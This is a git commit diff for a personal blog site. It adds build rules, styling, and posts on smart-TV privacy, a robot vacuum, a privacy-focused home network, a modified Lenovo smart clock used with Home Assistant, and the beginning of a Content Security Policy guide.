Updates everything
parent
ea220efc38
commit
7cf34b3650
24 changed files with 1305 additions and 11 deletions
17
Makefile
17
Makefile
|
@ -65,6 +65,10 @@ public/%/index.html: content/%.md tmp/templates/taglist.html
|
|||
mkdir -p $(@D)
|
||||
pandoc --template=templates/blog.html -f markdown -t html5 -M comments $< > $@
|
||||
|
||||
public/startpage/index.html: templates/startpage.html
|
||||
mkdir -p $(@D)
|
||||
cp $< $@
|
||||
|
||||
public/blog/%/index.gmi: content/blog/*-%.md
|
||||
mkdir -p $(@D)
|
||||
echo -n "# " > $@
|
||||
|
@ -72,7 +76,14 @@ public/blog/%/index.gmi: content/blog/*-%.md
|
|||
echo "" >> $@
|
||||
md2gemini -f -l paragraph $< >> $@
|
||||
|
||||
public/card:
|
||||
public/%/index.gmi: content/%.md
|
||||
mkdir -p $(@D)
|
||||
echo -n "# " > $@
|
||||
grep 'title: ' $< | cut -d ' ' -f 2- >> $@
|
||||
echo "" >> $@
|
||||
md2gemini -f -l paragraph $< >> $@
|
||||
|
||||
public/card: content/card.curl
|
||||
content/card.curl > $@
|
||||
|
||||
###########
|
||||
|
@ -83,9 +94,9 @@ tags: $(foreach tag, $(ALLTAGS), public/tag/$(shell echo $(tag) | tr 'A-Z' 'a-z'
|
|||
|
||||
blogs: $(foreach blog, $(ALLBLOGS), public/blog/$(shell echo $(blog) | tr 'A-Z' 'a-z')/index.html ) $(foreach blog, $(ALLBLOGS), public/blog/$(shell echo $(blog) | tr 'A-Z' 'a-z')/index.gmi )
|
||||
|
||||
standalone: $(foreach page, $(STANDALONE), public/$(page)/index.html )
|
||||
standalone: $(foreach page, $(STANDALONE), public/$(page)/index.html public/$(page)/index.gmi ) public/startpage/index.html
|
||||
|
||||
all: tags blogs standalone public/index.html public/feed.rss public/card
|
||||
all: tags blogs standalone public/index.html public/index.gmi public/feed.rss public/card
|
||||
|
||||
push-blog:
|
||||
rsync -azvhP ./public/ generalPurpose:docker/jonathanh/public
|
||||
|
|
|
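Review bot: The new `public/%/index.gmi` recipe assembles `$@` with five separate `>`/`>>` steps and the file does not appear to set `.DELETE_ON_ERROR:`, so if `md2gemini` fails part-way (or `grep 'title: '` finds nothing, which the pipe into `cut` masks unless `SHELL`/`.SHELLFLAGS` enable pipefail somewhere outside this hunk) a truncated `index.gmi` is left behind that is newer than its `.md` source, and the next `make` treats it as up to date; the same applies to the new `public/card: content/card.curl` rule, where a failing `content/card.curl > $@` still leaves an empty `public/card`. Adding `.DELETE_ON_ERROR:` near the top of the Makefile (outside this hunk) is the one-line fix; alternatively write to `$@.tmp` and finish each recipe with `mv -f $@.tmp $@`. The recipe also duplicates the pre-existing `public/blog/%/index.gmi` body line for line, so a shared `define gmi-recipe` / `endef` used by both rules would keep any such fix in one place. Note that the third hunk's `blogs:`/`standalone:` prerequisite lists fork one `$(shell echo … | tr)` per entry on every parse; `$(shell echo $(ALLBLOGS) | tr 'A-Z' 'a-z')` once into a `:=` variable would avoid that.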
@ -107,6 +107,9 @@ main{
|
|||
max-width: 95%;
|
||||
@media (min-width: 50em){
|
||||
max-width: 70%;
|
||||
&.wide{
|
||||
max-width: 95%;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
@ -132,16 +135,34 @@ li{
|
|||
// overflow: auto;
|
||||
//}
|
||||
|
||||
.col-container{
|
||||
display: flex;
|
||||
flex-direction: row;
|
||||
flex-wrap: wrap;
|
||||
h1{
|
||||
width: 100%;
|
||||
}
|
||||
}
|
||||
|
||||
article{
|
||||
background-color: @gb-dm-bg1;
|
||||
margin: 1em;
|
||||
padding: 1em;
|
||||
border-radius: 1em;
|
||||
width: 100%;
|
||||
&.col{
|
||||
@media (min-width: 50em){
|
||||
width: 25%;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
footer{
|
||||
display: flex;
|
||||
flex-direction: column;
|
||||
@media (min-width: 50em){
|
||||
flex-direction: row;
|
||||
}
|
||||
justify-content: space-between;
|
||||
background-color: @gb-dm-bg3;
|
||||
padding: 0.5em;
|
||||
|
|
BIN
assets/lenovo-clock/microphone-board.jpg
Normal file
BIN
assets/lenovo-clock/microphone-board.jpg
Normal file
BIN
assets/lenovo-clock/screen-screws.jpg
Normal file
BIN
assets/lenovo-clock/screen-screws.jpg
Normal file
BIN
assets/lenovo-clock/screenshot.png
Normal file
BIN
assets/lenovo-clock/screenshot.png
Normal file
BIN
assets/van/24cf7a6dbc63425b9de9439f850e1897.jpg
Normal file
BIN
assets/van/24cf7a6dbc63425b9de9439f850e1897.jpg
Normal file
BIN
assets/van/68d3da94e7944b3ead7b0f400bd79909.jpg
Normal file
BIN
assets/van/68d3da94e7944b3ead7b0f400bd79909.jpg
Normal file
116
content/blog/017-why-cant-i-buy-a-dumb-tv.md
Normal file
116
content/blog/017-why-cant-i-buy-a-dumb-tv.md
Normal file
|
@ -0,0 +1,116 @@
|
|||
---
|
||||
title: Why can't I buy a dumb TV?
|
||||
date: 2022-12-31
|
||||
tags:
|
||||
- Privacy
|
||||
description: Dumb TVs don't appear to be a thing anymore. I wonder why?
|
||||
---
|
||||
|
||||
Our old TV is showing it's age a bit. It's an old Samsung. About 30" and 1080p.
|
||||
It works fine, but certainly isn't what you'd call modern. I think it dates from
|
||||
around 2010.
|
||||
|
||||
I thought I'd look and see how much it would cost to replace it -- allowing me to
|
||||
use it as a monitor. I spend the majority of my time in a terminal, I don't game
|
||||
and as such 4k, high refresh rate, wide screen monitors are of little interest
|
||||
to me. What is of interest to me is how many terminal windows I can tile and
|
||||
still use.
|
||||
|
||||
Anyway, I went to various sites and navigated to TVs. What I found surprised me
|
||||
a little: no dumb TVs. None at all. There were smart, 4k 55" TVs for under £400,
|
||||
but nothing without "smart features".
|
||||
|
||||
Most people assume that if I don't like something, it's because of privacy
|
||||
concerns or similar. While this is partly true for TVs, it's not my main
|
||||
dislike.
|
||||
|
||||
Smart TVs need to be maintained by the manufacturer when it is in their interest
|
||||
not to do so. Think about software updates. Is Samsung / LG / Sony / Philips going to
|
||||
be putting updates out for your TV in 10 or 15 years? If you think they might,
|
||||
take a look at how phones have gone. I'll use Samsung as an example: they offer
|
||||
3 years worth of feature updates and 4 years worth of security updates -- that is
|
||||
for their flagships. Lower end phones won't even get that. This means that after
|
||||
4 years, your Samsung flagship phone will not be patched for security issues.
|
||||
|
||||
Why would they do any different for TVs? Many smart TVs even run Android -- a
|
||||
variation on the system used on most smartphones.
|
||||
|
||||
That just relates to the manufacturer maintaining the device. Let alone the apps
|
||||
who can also [decide to stop supporting the TV](https://9to5google.com/2019/07/26/sony-tv-amazon-prime-video-september/).
|
||||
|
||||
It is bad enough spending hundreds (or thousands) of pounds on a phone every few
|
||||
years, I don't want to do the same for a TV.
|
||||
|
||||
"What about apps?", you might ask. This is a non issue. I can buy a 4k fire
|
||||
stick for less than £50. That is without offers. I've seen them sub-£30 on prime
|
||||
day. If that only lasts 3 years, I can swap that for a new one at the time,
|
||||
rather than swapping out my whole TV. I don't love the idea of replacing a set
|
||||
top box every few years, but I like that idea far more than replacing a whole
|
||||
TV.
|
||||
|
||||
Modern versions of HDMI will happily support your HDR, single remote and
|
||||
surround sound needs.
|
||||
|
||||
So, planned obsolescence is one reason, but I don't think it is the whole story.
|
||||
|
||||
I'm sure it won't come as a surprise to anyone reading this blog that data
|
||||
collection is a huge business these days. Targeting advertising allows companies
|
||||
to charge exuberant prices for well placed ads. The amount they can charge
|
||||
correlates nicely with the amount of data they can collect. It is no coincidence
|
||||
that the largest advertising companies (Google and ~~Facebook~~ Meta) are also
|
||||
two of the worst offenders for hoarding information.
|
||||
|
||||
TV manufacturers realised that they can make more money selling adverts than
|
||||
they can selling TVs. The more TVs they sell, the more they can charge for
|
||||
advertising. This is not just me and my tin foil hat. Vizio went public a year
|
||||
or so ago and, as a result, had to publish their financials. They made over
|
||||
[twice as much money selling ads as they made from TV sales](https://www.theverge.com/2021/11/10/22773073/vizio-acr-advertising-inscape-data-privacy-q3-2021).
|
||||
|
||||
This isn't the post to go into why I think it is important to protect your data.
|
||||
If you're reading my blog, you probably already have some idea. However, it
|
||||
seems that just as most of our phones, smart speakers and watches spy on us, our
|
||||
TVs are trying to do the same. Maybe you don't care if big companies know what
|
||||
you're watching. That is your decision, but it is a decision you should make --
|
||||
not one that you should be compelled into.
|
||||
|
||||
It seems clear to me that planned obsolescence isn't the only factor at play
|
||||
here. Sure, they want to sell you a TV every few years, but they also want to
|
||||
harvest as much data as possible in order to sell ads. I don't want this.
|
||||
|
||||
The question then becomes, what can we do about it? Unfortunately, I haven't
|
||||
found a good answer to this but here are some thoughts.
|
||||
|
||||
The first, and perhaps most obvious answer, is to buy a smart TV and just not
|
||||
connect it to the network. With this you get the advantage of (comparably) cheap
|
||||
units, and don't have the risk of data harvesting. A slight variation on this
|
||||
might be isolating the TV or blocking access via a firewall rule. This doesn't,
|
||||
however, mitigate the issue of security updates. Additionally, I'm told that
|
||||
many TVs will either not work at all, or continuously prompt you to connect them
|
||||
to the internet. I recently tried to use a Fire TV stick on a network without
|
||||
internet connectivity, in order to watch content stored on a local server with
|
||||
Jellyfin. The process was a long way from ideal. The home screen (where you
|
||||
would normally select the app such as Jellyfin) was replaced entirely with a
|
||||
network error and a prompt to go to network settings. Even apps that don't
|
||||
require an internet connection were unavailable.
|
||||
|
||||
It was possible to launch Jellyfin by going `Settings` -> `Applications` ->
|
||||
`Manage Installed Applications` -> `Jellyfin` -> `Launch Application`, but that
|
||||
is not a process I want to make every time I turn on the TV, and certainly not a
|
||||
solution that would get wife-approval. I have no idea if I would have similar
|
||||
issues with other devices, and buying a smart TV to test that is not
|
||||
particularly palatable.
|
||||
|
||||
Another option might be using a non-tv monitor as a TV. You can buy large
|
||||
computer monitors or displays meant for digital signage. Computer monitors of
|
||||
this size [are
|
||||
expensive](https://www.amazon.co.uk/Philips-558M1RY-Monitor-Ambiglow-FreeSync/dp/B086X4J9KG/ref=sr_1_3?keywords=65+inch+monitor+4k&qid=1672490924&sprefix=65+inch+monitor%2Caps%2C292&sr=8-3).
|
||||
Digital signage signs are also expensive, but do tend to come with the advantage
|
||||
that they are designed to be on all the time. Although I couldn't find much in
|
||||
the way of data, I suspect this would mean they would last longer. However,
|
||||
again, they are a lot more expensive than a consumer-grade smart TV.
|
||||
|
||||
My plan is to do some more research and try and find a smart tv that can be used
|
||||
without constant nags when not connected to the internet. If any of you know of
|
||||
such a device, or have any other ideas, let me know in the comments below.
|
||||
|
||||
|
71
content/blog/018-i-got-a-robot-vacuum.md
Normal file
71
content/blog/018-i-got-a-robot-vacuum.md
Normal file
|
@ -0,0 +1,71 @@
|
|||
---
|
||||
title: I Got a Robot Vacuum
|
||||
date: 2022-12-31
|
||||
tags:
|
||||
- Privacy
|
||||
- Home Assistant
|
||||
description: I recently bought a Robot vacuum. I have been amazed how good it is.
|
||||
---
|
||||
|
||||
So, you have probably seen or heard about robot vacuums. I had, although
|
||||
honestly thought they were a bit of a gimmick. However, a few people I know have
|
||||
them and sung their praises so I thought I'd see what the fuss was about.
|
||||
|
||||
I did some research and settled on the [Dreame L10 Pro](https://amzn.to/3GacxLz)
|
||||
([Non-Associates
|
||||
link](https://www.amazon.co.uk/Dreame-Dual-Line-Navigation-Multi-Level-Compatible/dp/B09YQ3VF3J/?th=1)).
|
||||
This was in no small part because it is known to work with
|
||||
[Valetudo](https://valetudo.cloud/) which allows for fully local control of the
|
||||
robot. As well as a very usable web interface, it also provides MQTT control
|
||||
which I use for [Home Assistant](/tag/home_assistant/) control.
|
||||
|
||||
It is fair to say that my expectations have been shattered by this device. I
|
||||
expected it to do a reasonable job, but that I would probably have to do a
|
||||
"proper" hoover once a week or so. That has not been the case. I have not had to
|
||||
manually hoover the floors at all since setting it up. I have been especially
|
||||
surprised by this as we have a dog who malts.
|
||||
|
||||
I have the vacuum set to vacuum our daytime living areas (lounge, kitchen, hall,
|
||||
study) every morning at 1am. I did not expect the quality of life improvement
|
||||
that we got from waking up every morning to a vacuumed house. Our bedroom is
|
||||
then vacuumed during the day while we work. Apart from emptying the vacuum's
|
||||
dustbin, this is entirely automatic.
|
||||
|
||||
The vacuum I have has a detachable cloth and water tank that it can drag behind
|
||||
it and keep wet. I mostly got the device for its vacuum capabilities. However,
|
||||
the addition of the mop is nice. This, too, exceeded my expectations; although
|
||||
not to the same extent as the vacuum. It is nice to have, but I wouldn't buy
|
||||
this particular robot for its mopping capabilities. We tend to attach this mop
|
||||
and manually instruct the vacuum to mop various rooms when we go out.
|
||||
|
||||
## Any Cons?
|
||||
|
||||
Although this device has been an overwhelming positive in our life, it may not
|
||||
be for everyone.
|
||||
|
||||
We have hard floors throughout our flat. This obviously makes vacuuming and
|
||||
mopping easier for the robot. We do have a thick rug which it can struggle with
|
||||
a little. However, I have taken the robot to our parents' houses who have carpet
|
||||
and it has tackled even quite thick carpets without issue. If you have a lot of
|
||||
very thick rugs, you may want to do a bit more research into robots that can
|
||||
deal with them.
|
||||
|
||||
Also, the dustbin in the vacuum is quite small. I tend to empty it every other
|
||||
day. Paying more can get you features such as auto-emptying dustbins which the
|
||||
robot I got doesn't have.
|
||||
|
||||
We live in a flat, so we don't have stairs to contend with. We are due to move
|
||||
very soon into a house. My long term plan is to buy a second robot, in order to
|
||||
have one up stairs and one downstairs. This (obviously) makes a fully automated
|
||||
vacuuming setup significantly more expensive. However, the fact that I am
|
||||
planning this hopefully demonstrates how happy I am with this vacuum.
|
||||
|
||||
## Home Assistant
|
||||
|
||||
As mentioned, Valetudo allows me to control my robot entirely locally. My home
|
||||
automation platform of choice is Home Assistant which is [supported by
|
||||
Valetudo](https://valetudo.cloud/pages/integrations/home-assistant-integration.html).
|
||||
|
||||
With my smart light switches, it allows me to do things like push and hold the
|
||||
light switch in order to instruct the vacuum to come and hoover the room I'm in.
|
||||
It can also stop the vacuum from vacuuming every day while we are on holiday.
|
162
content/blog/019-my-new-home-network.md
Normal file
162
content/blog/019-my-new-home-network.md
Normal file
|
@ -0,0 +1,162 @@
|
|||
---
|
||||
title: My New Home - Network
|
||||
date: 2023-02-08
|
||||
tags:
|
||||
- Privacy
|
||||
- My New Home
|
||||
description: >
|
||||
I recently bought a new House. In this post, I discuss my network setup as
|
||||
part of a series of posts about the setup.
|
||||
---
|
||||
|
||||
So, we have finally moved into our new home. The buying process took far too
|
||||
long, I am sick to death of dealing with solicitors, but we are now in. I hope
|
||||
this will become a series of blog posts in which I detail the setup process.
|
||||
This particular post will be the network.
|
||||
|
||||
My initial intention had been to buy some land and build a house. However, the
|
||||
process of doing so in the UK was ... annoying, so instead we went for a new
|
||||
build. We found the property early enough in the build process that we were able
|
||||
to make various requests. One of which was for the electrician to run Cat-6
|
||||
ethernet cable throughout the house before the walls were plastered. The cables
|
||||
all run into our under-stairs cupboard which I managed to convince my wife to
|
||||
give me as a server room.
|
||||
|
||||
The majority of our rooms have 2 ethernet sockets in opposite corners. Our
|
||||
lounge has 4, one in each corner. Our hall and landing both have celling mounted
|
||||
ports for access points. I think this is probably more than we need, but at the
|
||||
time we didn't know how we'd lay the rooms out, so we put in more than we
|
||||
thought we'd need. I think this was a good choice. Running ethernet is much
|
||||
easier when you don't have plaster to contend with. And they are just sockets on
|
||||
the walls -- they are no uglier than mains, telephone or coax sockets.
|
||||
|
||||
## Network Gear
|
||||
|
||||
In terms of the network gear, I decided to take the plunge and try TP-Links
|
||||
Omada line. I think it is fair to say that in the pro-sumer arena, Ubiquity are
|
||||
the most popular. However, they are also expensive. I watched a lot of YouTube
|
||||
and decided that TP Link's product catered for my needs.
|
||||
|
||||
I bought:
|
||||
|
||||
* [A Router / firewall](https://amzn.to/3HwPACO) ([Non-Associates Link](https://www.amazon.co.uk/gp/product/B08SWR1K56/))
|
||||
* [A Switch](https://amzn.to/3I1rB07) ([Non-Associates Link](https://www.amazon.co.uk/gp/product/B08W4PM24H/))
|
||||
* [An Access Point](https://amzn.to/3RCFkxw) ([Non-Associates Link](https://www.amazon.co.uk/gp/product/B09ZF7HPFB/))
|
||||
|
||||
I won't go into too much detail on the individual devices I got as copying me is
|
||||
a pretty bad idea. You want to make the decision based on the size of your
|
||||
network, the speeds you need and the sorts of devices you want to attach.
|
||||
|
||||
## Network Configuration
|
||||
|
||||
I run the TP Link Omada Controller in a Docker container on my home server. I
|
||||
have had no issues with it at all so far.
|
||||
|
||||
In terms of the software itself, I would say that it's not quite on a par with
|
||||
Ubiquity's product, however, it is more than sufficient for my needs and I would
|
||||
think more than sufficient for most home users and small / medium businesses.
|
||||
|
||||
The only area I found it to be a little lacking was the firewall configuration.
|
||||
However, before I explain that, it would be helpful for me to explain the VLANs
|
||||
I have on my network. In case you don't know, a VLAN is a virtual network. It is
|
||||
useful for categorising and segregating devices. I have seen many examples
|
||||
across the internet of people who setup tens of VLANs for their home network.
|
||||
However, I think any security gains you may get from that are outweighed by the
|
||||
added complexity maintaining it. I have opted for two VLANs.
|
||||
|
||||
My first VLAN is for trusted devices. Trusted devices are my computers, my
|
||||
wife's computers, our phones and my server. These are able to communicate
|
||||
with each other and the internet.
|
||||
|
||||
My second VLAN is for smart devices. These are devices that have no business
|
||||
talking to each other or the internet. The only device they can communicate with
|
||||
is my server running Home Assistant, an NTP server and a DNS server.
|
||||
|
||||
This can all be achieved easily with the Omada software. Where it is lacking is
|
||||
in its inability to set up stateful firewall rules. I would like to configure
|
||||
the firewall so that devices on my trusted network can communicate with devices
|
||||
on the smart VLAN, and the smart devices should be able to reply. Meaning, from
|
||||
my laptop, I cannot SSH into [my vacuum](/blog/i-got-a-robot-vacuum/) because
|
||||
that requires 2 way communication. There is talk [on
|
||||
Reddit](https://libreddit.kavin.rocks/r/HomeNetworking/comments/mrxsbg/tplink_omada_switch_acls_arent_stateful/)
|
||||
that future firmware may support this, but at the moment it doesn't. I have got
|
||||
around this by using my server as a jump box to SSH from as smart devices are
|
||||
able to connect to this, although I'd prefer a stateful firewall solution.
|
||||
|
||||
I am also not able to force all DNS requests to my DNS server. On some router /
|
||||
firewall solutions, you can force all outbound traffic on port 53 (DNS) to a
|
||||
particular device. I have to rely on devices honouring the server specified via
|
||||
DHCP. However, they seem to be doing this. They are unable to communicate with
|
||||
any other servers so even if they are only honouring my choices because they
|
||||
have no choice, I don't really care.
|
||||
|
||||
## NTP
|
||||
|
||||
One of the issues I overlooked when planning my network setup was that of the
|
||||
Network Time Protocol (NTP). I have Chrony running on my server, but many
|
||||
devices don't allow you to specify an NTP server. Instead, they just silently
|
||||
fail, and leave you scratching your head whilst trying to correlate times in log
|
||||
files. A particularly annoying case of this had a device default to a date in
|
||||
January 2022. Whilst debugging an issue, it was January 2023 and I completely
|
||||
missed the fact that it was a year out for far too long.
|
||||
|
||||
It should be possible to configure an NTP server via DHCP. However, the Omada
|
||||
software doesn't [appear to support
|
||||
it](https://community.tp-link.com/en/business/forum/topic/256680). Eventually, I
|
||||
might allow my Pi Hole to manage IP assignment which would allow me to configure
|
||||
the appropriate DHCP options, although that would still be reliant on devices
|
||||
obeying it.
|
||||
|
||||
For now, I have pointed the domains I saw being used at my server, which appears
|
||||
to have worked.
|
||||
|
||||
## Network Connection
|
||||
|
||||
Another issue I came across is that some mobile apps for self hosted programs
|
||||
don't work without an internet connection. I [raised an
|
||||
issue](https://github.com/advplyr/audiobookshelf-app/issues/566) for
|
||||
Audiobookshelf. The owner responded quickly and after a few screenshots
|
||||
acknowledged the bug. This is not supposed to be a knock on the app -- I have
|
||||
been hugely impressed by the speed of responses I've had from the team who work
|
||||
on it. It is instead supposed to highlight the fact that many tools are not
|
||||
tested against the sort of non-standard setup I have here. As a result, I am
|
||||
going to run into issues that I wasn't expecting.
|
||||
|
||||
In the case of Audiobookshelf, it looks like one of its libraries checks for
|
||||
internet connectivity rather than network connectivity. After checking my
|
||||
pihole's logs, it turns out that Android devices make regular (unencrypted)
|
||||
requests to <http://connectivitycheck.gstatic.com>. This is used to identify
|
||||
captive portals as well as verify internet connectivity. Fortunately for me,
|
||||
being unencrypted, I can host a simple webserver and point that domain at it on
|
||||
my network. So that's what I did. The relevant NGINX config is below:
|
||||
|
||||
```nginx
|
||||
server {
|
||||
listen 80;
|
||||
listen [::]:80;
|
||||
|
||||
server_name connectivitycheck.gstatic.com;
|
||||
|
||||
location / {
|
||||
return 204;
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
After this, the app started working as expected.
|
||||
|
||||
## WPS
|
||||
|
||||
WPS is a method of connecting to a network without having to enter a password.
|
||||
It generally involves pushing a button on your access point and a button on your
|
||||
phone / device then "magically" the device is on your network. This method of
|
||||
connection has been shown to have several security weaknesses. Many modern
|
||||
solutions, including Omada and Ubiquiti have stopped providing this as an
|
||||
option.
|
||||
|
||||
I approve of this decision, it is something I would have disabled if it had been
|
||||
present. However, my printer has no other way of connecting to the network. No
|
||||
ethernet and no way to enter a password. I think I'll probably have to dig out
|
||||
an old router that does support WPS and hope that after connecting, the printer
|
||||
will have a web interface that allows me to change the network configuration. If
|
||||
not, I may have to just plug a small SBC into it and run a cups server on that.
|
209
content/blog/020-my-new-home-alarm-clock.md
Normal file
209
content/blog/020-my-new-home-alarm-clock.md
Normal file
|
@ -0,0 +1,209 @@
|
|||
---
|
||||
title: My New Home - Alarm Clock
|
||||
date: 2023-02-26
|
||||
tags:
|
||||
- Privacy
|
||||
- My New Home
|
||||
- Home Assistant
|
||||
description: >
|
||||
Part 2 of my new home setup. I discuss a Lenovo clock I got.
|
||||
---
|
||||
|
||||
I recently picked up a [Lenovo Clock
|
||||
2](https://www.lenovo.com/gb/en/p/smart-devices/smart-home/smart-home-series/lenovo-smart-clock-2/wmd00000485)
|
||||
on offer. I got it for around £25. I knew it ran Android and thought
|
||||
that for that price, it was worth picking one up to mess with.
|
||||
|
||||
After a couple of searches, I found a guide to installing other android apps on
|
||||
it.
|
||||
|
||||
<https://forum.xda-developers.com/t/guide-installing-android-apps-on-the-lenovo-smart-clock-2.4393271/>
|
||||
|
||||
Once I'd installed a custom launcher, I was able to get into the android
|
||||
settings and start disabling apps. I disabled the vast majority of them although
|
||||
I was unable to disable the Google Assistant app. At the time of writing, there
|
||||
doesn't appear to be a reliable root method for the device. There is also no USB
|
||||
interface so even an adb shell was unachievable.
|
||||
|
||||
## Dealing with the microphones
|
||||
|
||||
For me to have a device like this plugged in, in my house, I want to be
|
||||
absolutely certain that it isn't sending any data back to its Google mothership.
|
||||
|
||||
The device has a toggle on the back that switches the microphone off. This is a
|
||||
software toggle. This has 2 issues. Firstly, it could conceivably be overwritten
|
||||
in software. Second, it puts an icon on the screen to tell you that it's muted.
|
||||
This takes up a significant part of an already small screen. So, I took the
|
||||
device apart to see if the microphones were removable.
|
||||
|
||||
I should probably make the point here that the following procedure will void any
|
||||
warranties you may have on the device. Also, this is not advice, I am not
|
||||
responsible if you break it, or hurt yourself or anything else.
|
||||
|
||||
Disassembly was surprisingly easy. After unsticking the non-slip
|
||||
ring on the bottom, there were four screws to undo -- one in each corner. After
|
||||
doing this, the bottom of the device can be prized off. There are a few plastic
|
||||
clips and a ribbon cable to be aware of, but if you have ever disasembed
|
||||
anything before, it should be quite easy.
|
||||
|
||||

|
||||
|
||||
This then exposes a couple of additional screws which hold the screen in place,
|
||||
highlighted above. The screen can then be removed, exposing a circuit board
|
||||
containing the microphones and the ambient light sensor.
|
||||
|
||||

|
||||
|
||||
This can be removed. It is friction fit and there is another ribbon cable.
|
||||
Remove the ribbon cable and the microphones and sensor can be removed. Put
|
||||
everything back together and plug it in - there you go. You have a device that
|
||||
**cannot** listen to you.
|
||||
|
||||
This may be overkill, this device is going on a VLAN that doesn't have internet
|
||||
access so there should be no way for it to talk back anyway. However, defence in
|
||||
depth is the best option in my opinion. If I connect it to the wrong network or
|
||||
misconfigure my firewall, I don't want it sending any information back to
|
||||
anyone.
|
||||
|
||||
## Home Assistant Setup
|
||||
|
||||
Next step, for me, was to set it up as a Home Assistant screen. I was able to
|
||||
install [WallPanel](https://github.com/thecowan/wallpanel-android) which is a
|
||||
browser that can be controlled remotely via an HTTP API or MQTT. It is similar
|
||||
to the concept of [FullyKioskBrowser](https://www.fully-kiosk.com/). It is open
|
||||
source though and doesn't lock features behind a paywall. I've used
|
||||
FullyKioskBrowser before, and it is a very competent piece of software, but I
|
||||
felt like trying something new.
|
||||
|
||||
I created a simple dashboard in Home Assistant, and set the start URL for
|
||||
wallpanel to that dashboard. The screen is small, so you don't really want lots
|
||||
of information on there. I have a clock, an alarm clock toggle, a radio
|
||||
station selection (more on that later) and a few buttons.
|
||||
|
||||
The next part of the setup was [Browser
|
||||
Mod](https://github.com/thomasloven/hass-browser_mod). This allows you to
|
||||
control a browser window through Home Assistant, adding the ability to use it as
|
||||
a media player or hide the navigation elements that are usually present. This
|
||||
allowed me to play (local) audio on the clock. It also allows me to remove the
|
||||
sidebar and top bar on the device to reclaim a little screen space.
|
||||
|
||||
### Radio
|
||||
|
||||
One of the side effects of not allowing the clock to access the internet means
|
||||
it can't play internet radio (hopefully that isn't a surprise to anyone).
|
||||
However, I like to be woken up to the radio. It is probably possible to add some
|
||||
radio IP addresses to a whitelist. However, to make my life easier, I decided to
|
||||
proxy any radio stations through my home server, which does have internet
|
||||
access and the smart clock can communicate with.
|
||||
|
||||
For the most part this was pretty simple. I found stream URLs for a couple of
|
||||
radio stations. Here is the nginx configuration for Classic FM and Absolute
|
||||
Radio.
|
||||
|
||||
```nginx
|
||||
perl_set $unix_timestamp 'sub {
|
||||
time();
|
||||
}';
|
||||
|
||||
server {
|
||||
listen 443 ssl;
|
||||
listen [::]:443 ssl;
|
||||
|
||||
ssl_certificate /etc/nginx/certs/fullchain1.pem;
|
||||
ssl_certificate_key /etc/nginx/certs/privkey1.pem;
|
||||
|
||||
server_name radio.my.domain
|
||||
include /etc/nginx/conf.d/acl.inc;
|
||||
|
||||
location /classicfm {
|
||||
proxy_pass http://icecast.thisisdax.com/ClassicFMMP3;
|
||||
}
|
||||
|
||||
location /absolute {
|
||||
resolver 1.1.1.1;
|
||||
proxy_pass http://edge-bauerabsolute-05-gos2.sharp-stream.com/absoluteradiohigh.aac?aw_0_1st.skey=${unix_timestamp}&aw_0_1st.playerid=BMUK_RPi;
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
I'm sure you can see how this can be extended for more stations. The only thing
|
||||
that may not be obvious is the `unix_timestamp` variable in the absolute radio
|
||||
url. I don't know why it is necessary, but for some reason it is, so I define a
|
||||
variable in the `perl_set` block at the top.
|
||||
|
||||
So, with this, I can run
|
||||
|
||||
```bash
|
||||
mpv https://radio.my.domain/classicfm
|
||||
```
|
||||
|
||||
And ClassicFM will play. With BrowserMod set up for the device, I can then run
|
||||
the service:
|
||||
|
||||
```yaml
|
||||
service: media_player.play_media
|
||||
target:
|
||||
entity_id: media_player.alarm_clock
|
||||
data:
|
||||
media_content_type: music
|
||||
media_content_id: "https://radio.my.domain/classicfm"
|
||||
```
|
||||
|
||||
I would like to be able to add these URLs to the media library, however I
|
||||
haven't yet found a way to do that. If anyone knows of a way, please let me
|
||||
know. However, for now I created a text helper with the following:
|
||||
|
||||
* Off
|
||||
* Absolute Radio
|
||||
* Classic FM
|
||||
|
||||
I then created an automation:
|
||||
|
||||
```yaml
|
||||
- alias: Clock Radio
|
||||
trigger:
|
||||
- platform: state
|
||||
entity_id:
|
||||
- input_select.bedroom_radio
|
||||
condition: []
|
||||
action:
|
||||
- if:
|
||||
- condition: state
|
||||
entity_id: input_select.radio
|
||||
state: Classic FM
|
||||
then:
|
||||
- service: media_player.play_media
|
||||
data:
|
||||
media_content_id: https://radio.hodgson.one/classicfm
|
||||
media_content_type: music
|
||||
target:
|
||||
entity_id: media_player.alarm_clock
|
||||
- if:
|
||||
- condition: state
|
||||
entity_id: input_select.radio
|
||||
state: Absolute Radio
|
||||
then:
|
||||
- service: media_player.play_media
|
||||
data:
|
||||
media_content_id: https://radio.hodgson.one/absolute
|
||||
media_content_type: music
|
||||
target:
|
||||
entity_id: media_player.alarm_clock
|
||||
- if:
|
||||
- condition: state
|
||||
entity_id: input_select.radio
|
||||
state: 'Off'
|
||||
then:
|
||||
- service: media_player.media_stop
|
||||
data: {}
|
||||
target:
|
||||
entity_id: media_player.alarm_clock
|
||||
mode: single
|
||||
```
|
||||
|
||||
The last step is an automation for my alarm clock. It simply sets the input
|
||||
select we set up to ClassicFM. This then plays on the speaker.
|
||||
|
||||
The result is below:
|
||||
|
||||

|
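--- a/content/blog/021-csp.md
+++ b/content/blog/021-csp.md
@@ -0,0 +1,360 @@
+---
+title: Setting a good Content Security Policy
+date: 2024-08-22
+tags:
+- Security
+- Websites
+description: >
+Setting a good CSP can be hard. Here I go through what it is, and how to set
+it up well.
+---
+
+The Content Security Policy (CSP) is a powerful security feature that helps
+protect your website from cross-site scripting (XSS) attacks and other types of
+code injection vulnerabilities. There are some directives that do other things,
+but the bulk of this blog post will cover using the `fetch-directives`, or the
+elements of the CSP that allow you to specify a allow-list of approved sources
+from which resources This helps prevent malicious code from being executed on
+your site.
+
+To implement CSP, you need to set the Content-Security-Policy HTTP header on
+your web server. Here's an example of what a basic CSP header might look like:
+
+```
+Content-Security-Policy: default-src 'self'; script-src 'self' https://example.com
+```
+
+Let's break down the different directives in this example:
+
+- `default-src 'self'`: This sets the default source for all resource types to the same origin (i.e., your own website). This is a good baseline to start with.
+- `script-src 'self' https://example.com`: This specifies that scripts can only be loaded from your own site (`'self'`) and the `https://example.com` domain. This helps prevent the execution of any unauthorized scripts.
+
+It is worth noting that default-src applies to all source types that haven't
+been explicitly specified. Any sources that are explicitly specified overwrite
+then default-src, they are not added to it.
+
+Consider the following:
+
+```
+Content-Security-Policy: default-src 'self'; script-src https://example.com
+```
+
+This will not allow scripts to sourced from the current origin, despite `'self'`
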